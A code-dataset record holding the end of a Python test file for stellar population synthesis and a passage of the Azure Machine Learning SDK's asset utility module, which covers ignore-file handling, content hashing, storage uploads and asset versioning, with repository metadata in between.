feh = GaussianPrior(-0.2, 0.2)
distance = DistancePrior(max_distance=3000) # pc
AV = AVPrior(bounds=[0, 2])
pop = StarPopulation(mist, imf=imf, fB=fB, gamma=gamma, sfh=sfh, feh=feh, distance=distance, AV=AV)
self.pop = pop
self.mist = mist
self.df = pop.generate(1000)
self.dereddened_df = deredden(self.df)
def test_old_deredden(self):
"""Test dereddening against version that regenerates population
"""
old_dereddened_df = old_deredden(self.mist, self.df)
assert_frame_equal(self.dereddened_df.fillna(0), old_dereddened_df.fillna(0))
def test_mags(self):
"""Check no total mags are null
"""
mags = [f"{b}_mag" for b in self.mist.bands]
assert self.df[mags].isnull().sum().sum() == 0
def test_dereddening(self):
"""Check mass, age, feh the same when dereddened
"""
cols = ["initial_mass_0", "initial_feh_0", "requested_age_0"]
assert_frame_equal(self.df[cols], self.dereddened_df[cols])
# Check de-reddening vis-a-vis A_x
for b in self.mist.bands:
diff = (self.dereddened_df[f"{b}_mag"] + self.df[f"A_{b}_0"]) - self.df[f"{b}_mag"]
is_binary = self.df.mass_1 > 0
assert diff.loc[~is_binary].std() < 0.0001
def test_extinction(self):
from numpy.testing import assert_array_almost_equal
from isochrones.utils import addmags
import numpy as np
assert_array_almost_equal(
self.df["G_mag"],
addmags(
self.dereddened_df["G_mag_0"] + self.df["A_G_0"],
(self.dereddened_df["G_mag_1"] + self.df["A_G_1"]).fillna(np.inf),
),
)
def test_generate(self):
"""Make sure corner case when regenerating 1 doesn't break.
"""
for i in range(10):
self.pop.generate(10)
|
0cbc04f7c6ad965d5bb38208a4edcf072e19a528
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/ml/azure-ai-ml/azure/ai/ml/_utils/_asset_utils.py
|
bc302cf35c9f312e02609c479714ad6c7ea32d0b
|
[
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 42,111
|
py
|
_asset_utils.py
|
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=protected-access,too-many-lines
import hashlib
import logging
import os
import uuid
import warnings
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from multiprocessing import cpu_count
from os import PathLike
from pathlib import Path
from platform import system
from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, Tuple, Union, cast
from colorama import Fore
from tqdm import TqdmWarning, tqdm
from typing_extensions import Literal
from azure.ai.ml._artifacts._constants import (
AML_IGNORE_FILE_NAME,
ARTIFACT_ORIGIN,
AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
BLOB_STORAGE_CLIENT_NAME,
CHUNK_SIZE,
DEFAULT_CONNECTION_TIMEOUT,
EMPTY_DIRECTORY_ERROR,
GEN2_STORAGE_CLIENT_NAME,
GIT_IGNORE_FILE_NAME,
INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
MAX_CONCURRENCY,
PROCESSES_PER_CORE,
UPLOAD_CONFIRMATION,
WORKSPACE_MANAGED_DATASTORE,
WORKSPACE_MANAGED_DATASTORE_WITH_SLASH,
)
from azure.ai.ml._restclient.v2022_02_01_preview.operations import ( # pylint: disable = unused-import
ComponentContainersOperations,
ComponentVersionsOperations,
DataContainersOperations,
DataVersionsOperations,
EnvironmentContainersOperations,
EnvironmentVersionsOperations,
ModelContainersOperations,
ModelVersionsOperations,
)
from azure.ai.ml._restclient.v2022_05_01.models import (
DataVersionBaseData,
ModelVersionData,
ModelVersionResourceArmPaginatedResult,
)
from azure.ai.ml._restclient.v2023_04_01.models import PendingUploadRequestDto
from azure.ai.ml._utils._pathspec import GitWildMatchPattern, normalize_file
from azure.ai.ml._utils.utils import convert_windows_path_to_unix, retry, snake_to_camel
from azure.ai.ml.constants._common import MAX_AUTOINCREMENT_ATTEMPTS, DefaultOpenEncoding, OrderString
from azure.ai.ml.entities._assets.asset import Asset
from azure.ai.ml.exceptions import (
AssetPathException,
EmptyDirectoryError,
ErrorCategory,
ErrorTarget,
ValidationErrorType,
ValidationException,
)
from azure.core.exceptions import ResourceExistsError, ResourceNotFoundError
if TYPE_CHECKING:
from azure.ai.ml.operations import ComponentOperations, DataOperations, EnvironmentOperations, ModelOperations
hash_type = type(hashlib.md5()) # nosec
module_logger = logging.getLogger(__name__)
class AssetNotChangedError(Exception):
pass
class IgnoreFile(object):
def __init__(self, file_path: Optional[Union[str, os.PathLike]] = None):
"""Base class for handling .gitignore and .amlignore files.
:param file_path: Relative path, or absolute path to the ignore file.
"""
path = Path(file_path).resolve() if file_path else None
self._path = path
self._path_spec = None
def exists(self) -> bool:
"""Checks if ignore file exists.
:return: True if file exists. False Otherwise
:rtype: bool
"""
return self._file_exists()
def _file_exists(self) -> bool:
return self._path and self._path.exists()
@property
def base_path(self) -> Path:
return self._path.parent
def _get_ignore_list(self) -> List[str]:
"""Get ignore list from ignore file contents.
:return: The lines of the ignore file
:rtype: List[str]
"""
if not self.exists():
return []
if self._file_exists():
with open(self._path, "r", encoding=DefaultOpenEncoding.READ) as fh:
return [line.rstrip() for line in fh if line]
return []
def _create_pathspec(self) -> List[GitWildMatchPattern]:
"""Creates path specification based on ignore list.
:return: Path specification
:rtype: List[GitWildMatchPattern]
"""
return [GitWildMatchPattern(ignore) for ignore in self._get_ignore_list()]
def _get_rel_path(self, file_path: Union[str, os.PathLike]) -> Optional[str]:
"""Get relative path of given file_path.
:param file_path: A file path
:type file_path: Union[str, os.PathLike]
:return: file_path relative to base_path, if computable. None otherwise
:rtype: Optional[str]
"""
file_path = Path(file_path).absolute()
try:
# use os.path.relpath instead of Path.relative_to in case file_path is not a child of self.base_path
return os.path.relpath(file_path, self.base_path)
except ValueError:
# 2 paths are on different drives
return None
def is_file_excluded(self, file_path: Union[str, os.PathLike]) -> bool:
"""Checks if given file_path is excluded.
:param file_path: File path to be checked against ignore file specifications
:type file_path: Union[str, os.PathLike]
:return: Whether the file is excluded by ignore file
:rtype: bool
"""
# TODO: current design of ignore file can't distinguish between files and directories of the same name
if self._path_spec is None:
self._path_spec = self._create_pathspec()
if not self._path_spec:
return False
file_path = self._get_rel_path(file_path)
if file_path is None:
return True
norm_file = normalize_file(file_path)
matched = False
for pattern in self._path_spec:
if pattern.include is not None:
if pattern.match_file(norm_file) is not None:
matched = pattern.include
return matched
@property
def path(self) -> Union[Path, str]:
return self._path
class AmlIgnoreFile(IgnoreFile):
def __init__(self, directory_path: Union[Path, str]):
file_path = Path(directory_path).joinpath(AML_IGNORE_FILE_NAME)
super(AmlIgnoreFile, self).__init__(file_path)
class GitIgnoreFile(IgnoreFile):
def __init__(self, directory_path: Union[Path, str]):
file_path = Path(directory_path).joinpath(GIT_IGNORE_FILE_NAME)
super(GitIgnoreFile, self).__init__(file_path)
def get_ignore_file(directory_path: Union[Path, str]) -> IgnoreFile:
"""Finds and returns IgnoreFile object based on ignore file found in directory_path.
.amlignore takes precedence over .gitignore and if no file is found, an empty
IgnoreFile object will be returned.
The ignore file must be in the root directory.
:param directory_path: Path to the (root) directory where ignore file is located
:type directory_path: Union[Path, str]
:return: The IgnoreFile found in the directory
:rtype: IgnoreFile
"""
aml_ignore = AmlIgnoreFile(directory_path)
git_ignore = GitIgnoreFile(directory_path)
if aml_ignore.exists():
return aml_ignore
if git_ignore.exists():
return git_ignore
return IgnoreFile()
def _validate_path(path: Union[str, os.PathLike], _type: str) -> None:
path = Path(path) # Okay to do this since Path is idempotent
if not path.is_file() and not path.is_dir():
raise ValidationException(
message=f"No such file or directory: {path}",
target=_type,
error_type=ValidationErrorType.FILE_OR_FOLDER_NOT_FOUND,
no_personal_data_message="No such file or directory",
error_category=ErrorCategory.USER_ERROR,
)
def _parse_name_version(
name: Optional[str] = None, version_as_int: bool = True
) -> Tuple[Optional[str], Optional[Union[str, int]]]:
if not name:
return None, None
token_list = name.split(":")
if len(token_list) == 1:
return name, None
*name, version = token_list
if version_as_int:
version = int(version)
return ":".join(name), version
def _get_file_hash(filename: Union[str, os.PathLike], _hash: hash_type) -> hash_type:
with open(str(filename), "rb") as f:
for chunk in iter(lambda: f.read(CHUNK_SIZE), b""):
_hash.update(chunk)
return _hash
def _get_dir_hash(directory: Union[str, os.PathLike], _hash: hash_type, ignore_file: IgnoreFile) -> hash_type:
dir_contents = Path(directory).iterdir()
sorted_contents = sorted(dir_contents, key=lambda path: str(path).lower())
for path in sorted_contents:
if ignore_file.is_file_excluded(path):
continue
_hash.update(path.name.encode())
if os.path.islink(path): # ensure we're hashing the contents of the linked file
path = _resolve_path(path)
if path.is_file():
_hash = _get_file_hash(path, _hash)
elif path.is_dir():
_hash = _get_dir_hash(path, _hash, ignore_file)
return _hash
def _build_metadata_dict(name: str, version: str) -> Dict[str, str]:
"""Build metadata dictionary to attach to uploaded data.
Metadata includes an upload confirmation field, and for code uploads only, the name and version of the code asset
being created for that data.
:param name: The name of the uploaded data
:type name: str
:param version: The version of the uploaded data
:type version: str
:return: Metadata dict
:rtype: Dict[str, str]
"""
if name:
linked_asset_arm_id = {"name": name, "version": version}
else:
msg = "'name' cannot be NoneType for asset artifact upload."
raise ValidationException(
message=msg,
no_personal_data_message=msg,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.INVALID_VALUE,
)
metadata_dict = {**UPLOAD_CONFIRMATION, **linked_asset_arm_id}
return metadata_dict
def get_object_hash(path: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile()) -> str:
_hash = hashlib.md5(b"Initialize for october 2021 AML CLI version") # nosec
if Path(path).is_dir():
object_hash = _get_dir_hash(directory=path, _hash=_hash, ignore_file=ignore_file)
else:
if os.path.islink(path): # ensure we're hashing the contents of the linked file
path = _resolve_path(Path(path))
object_hash = _get_file_hash(filename=path, _hash=_hash)
return str(object_hash.hexdigest())
def get_content_hash_version():
return 202208
def get_content_hash(path: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile()) -> Optional[str]:
"""Generating sha256 hash for file/folder,
e.g. Code snapshot fingerprints to prevent tampering.
The process of hashing is:
1. If it's a link, get the actual path of the link.
2. If it's a file, append file content.
3. If it's a folder:
1. list all files under the folder
2. convert file count to str and append to hash
3. sort the files by lower case of relative path
4. for each file append '#'+relative path+'#' and file size to hash
5. do another iteration on file list to append each files content to hash.
The example of absolute path to relative path mapping is:
[
('/mnt/c/codehash/code/file1.txt', 'file1.txt'),
('/mnt/c/codehash/code/folder1/file1.txt', 'folder1/file1.txt'),
('/mnt/c/codehash/code/Folder2/file1.txt', 'Folder2/file1.txt'),
('/mnt/c/codehash/code/Folder2/folder1/file1.txt', 'Folder2/folder1/file1.txt')
]
4. Hash the content and convert to hex digest string.
:param path: The directory to calculate the size of
:type path: Union[str, os.PathLike]
:param ignore_file: An ignore file that specifies files to ignore when computing the size
:type ignore_file: IgnoreFile
:return: The content hash if the content is a link, directory, or file. None otherwise
:rtype: Optional[str]
"""
# DO NOT change this function unless you change the verification logic together
actual_path = path
if os.path.islink(path):
actual_path = _resolve_path(Path(path)).as_posix()
if os.path.isdir(actual_path):
return _get_file_list_content_hash(get_upload_files_from_folder(actual_path, ignore_file=ignore_file))
if os.path.isfile(actual_path):
return _get_file_list_content_hash([(actual_path, Path(actual_path).name)])
return None
def get_upload_files_from_folder(
path: Union[str, os.PathLike], *, prefix: str = "", ignore_file: IgnoreFile = IgnoreFile()
) -> List[str]:
path = Path(path)
upload_paths = []
for root, _, files in os.walk(path, followlinks=True):
upload_paths += list(
traverse_directory(
root,
files,
prefix=Path(prefix).joinpath(Path(root).relative_to(path)).as_posix(),
ignore_file=ignore_file,
)
)
return upload_paths
def _get_file_list_content_hash(file_list) -> str:
# file_list is a list of tuples, (absolute_path, relative_path)
_hash = hashlib.sha256()
# Add file count to the hash and add '#' around file name then add each file's size to avoid collision like:
# Case 1:
# 'a.txt' with contents 'a'
# 'b.txt' with contents 'b'
#
# Case 2:
# cspell:disable-next-line
# 'a.txt' with contents 'ab.txtb'
_hash.update(str(len(file_list)).encode())
# Sort by "destination" path, since in this function destination prefix is empty and keep the link name in path.
for file_path, file_name in sorted(file_list, key=lambda x: str(x[1]).lower()):
_hash.update(("#" + file_name + "#").encode())
_hash.update(str(os.path.getsize(file_path)).encode())
for file_path, file_name in sorted(file_list, key=lambda x: str(x[1]).lower()):
_hash = _get_file_hash(file_path, _hash)
return str(_hash.hexdigest())
def traverse_directory( # pylint: disable=unused-argument
root: str,
files: List[str],
*,
prefix: str,
ignore_file: IgnoreFile = IgnoreFile(),
# keep this for backward compatibility
**kwargs: Any,
) -> Iterable[Tuple[str, Union[str, Any]]]:
"""Enumerate all files in the given directory and compose paths for them to be uploaded to in the remote storage.
e.g.
[/mnt/c/Users/dipeck/upload_files/my_file1.txt,
/mnt/c/Users/dipeck/upload_files/my_file2.txt] -->
[(/mnt/c/Users/dipeck/upload_files/my_file1.txt, LocalUpload/<guid>/upload_files/my_file1.txt),
(/mnt/c/Users/dipeck/upload_files/my_file2.txt, LocalUpload/<guid>/upload_files/my_file2.txt))]
:param root: Root directory path
:type root: str
:param files: List of all file paths in the directory
:type files: List[str]
:keyword prefix: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:paramtype prefix: str
:keyword ignore_file: The .amlignore or .gitignore file in the project directory
:paramtype ignore_file: azure.ai.ml._utils._asset_utils.IgnoreFile
:return: Zipped list of tuples representing the local path and remote destination path for each file
:rtype: Iterable[Tuple[str, Union[str, Any]]]
"""
# Normalize Windows paths. Note that path should be resolved first as long part will be converted to a shortcut in
# Windows. For example, C:\Users\too-long-user-name\test will be converted to C:\Users\too-lo~1\test by default.
# Refer to https://en.wikipedia.org/wiki/8.3_filename for more details.
root = Path(root).resolve().absolute()
# filter out files excluded by the ignore file
# TODO: inner ignore file won't take effect. A merged IgnoreFile need to be generated in code resolution.
origin_file_paths = [
root.joinpath(filename)
for filename in files
if not ignore_file.is_file_excluded(root.joinpath(filename).as_posix())
]
result = []
for origin_file_path in origin_file_paths:
relative_path = origin_file_path.relative_to(root)
result.append((_resolve_path(origin_file_path).as_posix(), Path(prefix).joinpath(relative_path).as_posix()))
return result
def _resolve_path(path: Path) -> Path:
if not path.is_symlink():
return path
link_path = path.resolve()
if not link_path.is_absolute():
link_path = path.parent.joinpath(link_path).resolve()
return _resolve_path(link_path)
def generate_asset_id(asset_hash: str, include_directory=True) -> str:
asset_id = asset_hash or str(uuid.uuid4())
if include_directory:
asset_id = "/".join((ARTIFACT_ORIGIN, asset_id))
return asset_id
def get_directory_size(
root: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile(None)
) -> Tuple[int, Dict[str, int]]:
"""Returns total size of a directory and a dictionary itemizing each sub- path and its size.
If an optional ignore_file argument is provided, then files specified in the ignore file are not included in the
directory size calculation.
:param root: The directory to calculate the size of
:type root: Union[str, os.PathLike]
:param ignore_file: An ignore file that specifies files to ignore when computing the size
:type ignore_file: IgnoreFile
:return: The computed size of the directory, and the sizes of the child paths
:rtype: Tuple[int, Dict[str, int]]
"""
total_size = 0
size_list = {}
for dirpath, _, filenames in os.walk(root, followlinks=True):
for name in filenames:
full_path = os.path.join(dirpath, name)
# Don't count files that are excluded by an ignore file
if ignore_file.is_file_excluded(full_path):
continue
if not os.path.islink(full_path):
path_size = os.path.getsize(full_path)
else:
# ensure we're counting the size of the linked file
# os.readlink returns a file path relative to dirpath, and must be
# re-joined to get a workable result
path_size = os.path.getsize(os.path.join(dirpath, os.readlink(convert_windows_path_to_unix(full_path))))
size_list[full_path] = path_size
total_size += path_size
return total_size, size_list
def upload_file(
storage_client: Union["BlobStorageClient", "Gen2StorageClient"],
source: str,
dest: Optional[str] = None,
msg: Optional[str] = None,
size: int = 0,
show_progress: Optional[bool] = None,
in_directory: bool = False,
callback: Optional[Any] = None,
) -> None:
"""Upload a single file to remote storage.
:param storage_client: Storage client object
:type storage_client: Union[
azure.ai.ml._artifacts._blob_storage_helper.BlobStorageClient,
azure.ai.ml._artifacts._gen2_storage_helper.Gen2StorageClient]
:param source: Local path to project directory
:type source: str
:param dest: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:type dest: str
:param msg: Message to be shown with progress bar (e.g. "Uploading <source>")
:type msg: str
:param size: Size of the file in bytes
:type size: int
:param show_progress: Whether to show progress bar or not
:type show_progress: bool
:param in_directory: Whether the file is part of a directory of files
:type in_directory: bool
:param callback: Callback to progress bar
:type callback: Any
:return: None
"""
validate_content = size > 0 # don't do checksum for empty files
if (
type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME
): # Only for Gen2StorageClient, Blob Storage doesn't have true directories
if in_directory:
storage_client.temp_sub_directory_client = None
file_name_tail = dest.split(os.path.sep)[-1]
# Indexing from 2 because the first two parts of the remote path will always be LocalUpload/<asset_id>
all_sub_folders = dest.split(os.path.sep)[2:-1]
# Create remote directories for each nested directory if file is in a nested directory
for sub_folder in all_sub_folders:
if storage_client.temp_sub_directory_client:
storage_client.temp_sub_directory_client = (
storage_client.temp_sub_directory_client.create_sub_directory(sub_folder)
)
else:
storage_client.temp_sub_directory_client = storage_client.directory_client.create_sub_directory(
sub_folder
)
storage_client.file_client = storage_client.temp_sub_directory_client.create_file(file_name_tail)
else:
storage_client.file_client = storage_client.directory_client.create_file(source.split("/")[-1])
with open(source, "rb") as data:
if show_progress and not in_directory:
file_size, _ = get_directory_size(source)
file_size_in_mb = file_size / 10**6
if file_size_in_mb < 1:
msg += Fore.GREEN + " (< 1 MB)"
else:
msg += Fore.GREEN + f" ({round(file_size_in_mb, 2)} MBs)"
cntx_manager = FileUploadProgressBar(msg=msg)
else:
cntx_manager = suppress()
with cntx_manager as c:
callback = c.update_to if (show_progress and not in_directory) else None
if type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME:
storage_client.file_client.upload_data(
data=data.read(),
overwrite=True,
validate_content=validate_content,
raw_response_hook=callback,
max_concurrency=MAX_CONCURRENCY,
)
elif type(storage_client).__name__ == BLOB_STORAGE_CLIENT_NAME:
storage_client.container_client.upload_blob(
name=dest,
data=data,
validate_content=validate_content,
overwrite=storage_client.overwrite,
raw_response_hook=callback,
max_concurrency=MAX_CONCURRENCY,
connection_timeout=DEFAULT_CONNECTION_TIMEOUT,
)
storage_client.uploaded_file_count += 1
def upload_directory(
storage_client: Union["BlobStorageClient", "Gen2StorageClient"],
source: Union[str, os.PathLike],
dest: str,
msg: str,
show_progress: bool,
ignore_file: IgnoreFile,
) -> None:
"""Upload directory to remote storage.
:param storage_client: Storage client object
:type storage_client: Union[
azure.ai.ml._artifacts._blob_storage_helper.BlobStorageClient,
azure.ai.ml._artifacts._gen2_storage_helper.Gen2StorageClient]
:param source: Local path to project directory
:type source: Union[str, os.PathLike]
:param dest: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:type dest: str
:param msg: Message to be shown with progress bar (e.g. "Uploading <source>")
:type msg: str
:param show_progress: Whether to show progress bar or not
:type show_progress: bool
:param ignore_file: The .amlignore or .gitignore file in the project directory
:type ignore_file: azure.ai.ml._utils._asset_utils.IgnoreFile
:return: None
"""
source_path = Path(source).resolve()
prefix = "" if dest == "" else dest + "/"
prefix += os.path.basename(source_path) + "/"
if (
type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME
): # Only for Gen2StorageClient, Blob Storage doesn't have true directories
storage_client.sub_directory_client = storage_client.directory_client.create_sub_directory(
prefix.strip("/").split("/")[-1]
)
# Enumerate all files in the given directory and compose paths for them to be uploaded to in the remote storage
upload_paths = get_upload_files_from_folder(
source_path,
prefix=prefix,
ignore_file=ignore_file,
)
size_dict = {}
total_size = 0
# Get each file's size for progress bar tracking
for path, _ in upload_paths:
# TODO: symbol links are already resolved
if os.path.islink(path):
path_size = os.path.getsize(
os.readlink(convert_windows_path_to_unix(path))
) # ensure we're counting the size of the linked file
else:
path_size = os.path.getsize(path)
size_dict[path] = path_size
total_size += path_size
upload_paths = sorted(upload_paths)
if len(upload_paths) == 0:
raise EmptyDirectoryError(
message=EMPTY_DIRECTORY_ERROR.format(source),
no_personal_data_message=msg.format("[source]"),
target=ErrorTarget.ARTIFACT,
error_category=ErrorCategory.USER_ERROR,
)
storage_client.total_file_count = len(upload_paths)
if (
type(storage_client).__name__ == BLOB_STORAGE_CLIENT_NAME
): # Only for Gen2StorageClient, Blob Storage doesn't have true directories
# Only for BlobStorageClient
# Azure Blob doesn't allow metadata setting at the directory level, so the first
# file in the directory is designated as the file where the confirmation metadata
# will be added at the end of the upload.
storage_client.indicator_file = upload_paths[0][1]
storage_client.check_blob_exists()
# Submit paths to workers for upload
num_cores = int(cpu_count()) * PROCESSES_PER_CORE
with ThreadPoolExecutor(max_workers=num_cores) as ex:
futures_dict = {
ex.submit(
upload_file,
storage_client=storage_client,
source=src,
dest=dest,
size=size_dict.get(src),
in_directory=True,
show_progress=show_progress,
): (src, dest)
for (src, dest) in upload_paths
}
if show_progress:
warnings.simplefilter("ignore", category=TqdmWarning)
msg += f" ({round(total_size/10**6, 2)} MBs)"
is_windows = system() == "Windows" # Default unicode progress bar doesn't display well on Windows
with tqdm(total=total_size, desc=msg, ascii=is_windows) as pbar:
for future in as_completed(futures_dict):
future.result() # access result to propagate any exceptions
file_path_name = futures_dict[future][0]
pbar.update(size_dict.get(file_path_name) or 0)
@retry(
exceptions=ResourceExistsError,
failure_msg="Asset creation exceeded maximum retries.",
logger=module_logger,
max_attempts=MAX_AUTOINCREMENT_ATTEMPTS,
)
def _create_or_update_autoincrement(
name: str,
body: Any,
version_operation: Any,
container_operation: Any,
resource_group_name: str,
workspace_name: str,
**kwargs,
) -> Any:
try:
container = container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
version = container.properties.next_version
except ResourceNotFoundError:
version = "1"
result = version_operation.create_or_update(
name=name,
version=version,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
body=body,
**kwargs,
)
return result
def _get_next_version_from_container(
name: str,
container_operation: Any,
resource_group_name: str,
workspace_name: str,
registry_name: str = None,
**kwargs,
) -> str:
try:
container = (
container_operation.get(
name=name,
resource_group_name=resource_group_name,
registry_name=registry_name,
**kwargs,
)
if registry_name
else container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
)
version = container.properties.next_version
except ResourceNotFoundError:
version = "1"
return version
def _get_latest_version_from_container(
asset_name: str,
container_operation: Any,
resource_group_name: str,
workspace_name: Optional[str] = None,
registry_name: Optional[str] = None,
**kwargs,
) -> str:
try:
container = (
container_operation.get(
name=asset_name,
resource_group_name=resource_group_name,
registry_name=registry_name,
**kwargs,
)
if registry_name
else container_operation.get(
name=asset_name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
)
version = container.properties.latest_version
except ResourceNotFoundError as e:
message = (
f"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else f"Asset {asset_name} does not exist in workspace {workspace_name}."
)
no_personal_data_message = (
"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else "Asset {asset_name} does not exist in workspace {workspace_name}."
)
raise ValidationException(
message=message,
no_personal_data_message=no_personal_data_message,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
) from e
return version
def _get_latest(
asset_name: str,
version_operation: Any,
resource_group_name: str,
workspace_name: Optional[str] = None,
registry_name: Optional[str] = None,
order_by: Literal[OrderString.CREATED_AT, OrderString.CREATED_AT_DESC] = OrderString.CREATED_AT_DESC,
**kwargs,
) -> Union[ModelVersionData, DataVersionBaseData]:
"""Retrieve the latest version of the asset with the given name.
Latest is defined as the most recently created, not the most recently updated.
:param asset_name: The asset name
:type asset_name: str
:param version_operation: Any
:type version_operation: Any
:param resource_group_name: The resource group name
:type resource_group_name: str
:param workspace_name: The workspace name
:type workspace_name: Optional[str]
:param registry_name: The registry name
:type registry_name: Optional[str]
:param order_by: Specifies how to order the results. Defaults to :attr:`OrderString.CREATED_AT_DESC`
:type order_by: Literal[OrderString.CREATED_AT, OrderString.CREATED_AT_DESC]
:return: The latest version of the requested asset
:rtype: Union[ModelVersionData, DataVersionBaseData]
"""
result = (
version_operation.list(
name=asset_name,
resource_group_name=resource_group_name,
registry_name=registry_name,
order_by=order_by,
top=1,
**kwargs,
)
if registry_name
else version_operation.list(
name=asset_name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
order_by=order_by,
top=1,
**kwargs,
)
)
try:
latest = result.next()
except StopIteration:
latest = None
if latest and isinstance(latest, ModelVersionResourceArmPaginatedResult):
# Data list return object doesn't require this since its elements are already DatasetVersionResources
latest = cast(ModelVersionData, latest)
if not latest:
message = (
f"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else f"Asset {asset_name} does not exist in workspace {workspace_name}."
)
no_personal_data_message = (
"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else "Asset {asset_name} does not exist in workspace {workspace_name}."
)
raise ValidationException(
message=message,
no_personal_data_message=no_personal_data_message,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
return latest
def _archive_or_restore(
asset_operations: Union[
"DataOperations",
"EnvironmentOperations",
"ModelOperations",
"ComponentOperations",
],
version_operation: Union[
"DataVersionsOperations",
"EnvironmentVersionsOperations",
"ModelVersionsOperations",
"ComponentVersionsOperations",
],
container_operation: Union[
"DataContainersOperations",
"EnvironmentContainersOperations",
"ModelContainersOperations",
"ComponentContainersOperations",
],
is_archived: bool,
name: str,
version: Optional[str] = None,
label: Optional[str] = None,
) -> None:
resource_group_name = asset_operations._operation_scope._resource_group_name
workspace_name = asset_operations._workspace_name
registry_name = asset_operations._registry_name
if version and label:
msg = "Cannot specify both version and label."
raise ValidationException(
message=msg,
no_personal_data_message=msg,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
if label:
version = _resolve_label_to_asset(asset_operations, name, label).version
if version:
version_resource = (
version_operation.get(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
)
if registry_name
else version_operation.get(
name=name,
version=version,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
)
)
version_resource.properties.is_archived = is_archived
version_operation.begin_create_or_update( # pylint: disable=expression-not-assigned
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=version_resource,
) if registry_name else version_operation.create_or_update(
name=name,
version=version,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
body=version_resource,
)
else:
container_resource = (
container_operation.get(
name=name,
resource_group_name=resource_group_name,
registry_name=registry_name,
)
if registry_name
else container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
)
)
container_resource.properties.is_archived = is_archived
container_operation.create_or_update( # pylint: disable=expression-not-assigned
name=name,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=container_resource,
) if registry_name else container_operation.create_or_update(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
body=container_resource,
)
def _resolve_label_to_asset(
assetOperations: Union[
"DataOperations",
"ComponentOperations",
"EnvironmentOperations",
"ModelOperations",
],
name: str,
label: str,
) -> Asset:
"""Returns the asset referred to by the given label.
Throws if label does not refer to a version of the named asset
:param assetOperations: The operations class used to retrieve the asset
:type assetOperations: Union["DataOperations", "ComponentOperations", "EnvironmentOperations", "ModelOperations"]
:param name: The name of the asset
:type name: str
:param label: The label to resolve
:type label: str
:return: The requested asset
:rtype: Asset
"""
resolver = assetOperations._managed_label_resolver.get(label, None)
if not resolver:
scope = "registry" if assetOperations._registry_name else "workspace"
msg = "Asset {} with version label {} does not exist in {}."
raise ValidationException(
message=msg.format(name, label, scope),
no_personal_data_message=msg.format("[name]", "[label]", "[scope]"),
target=ErrorTarget.ASSET,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
return resolver(name)
def _check_or_modify_auto_delete_setting(
autoDeleteSetting: Union[Dict, "AutoDeleteSetting"],
):
if autoDeleteSetting is not None:
if hasattr(autoDeleteSetting, "condition"):
condition = getattr(autoDeleteSetting, "condition")
condition = snake_to_camel(condition)
setattr(autoDeleteSetting, "condition", condition)
elif "condition" in autoDeleteSetting:
autoDeleteSetting["condition"] = snake_to_camel(autoDeleteSetting["condition"])
def _validate_workspace_managed_datastore(path: Optional[Union[str, PathLike]]) -> Optional[Union[str, PathLike]]:
# block cumtomer specified path on managed datastore
if path.startswith(WORKSPACE_MANAGED_DATASTORE_WITH_SLASH) or path == WORKSPACE_MANAGED_DATASTORE:
path = path.rstrip("/")
if path != WORKSPACE_MANAGED_DATASTORE:
raise AssetPathException(
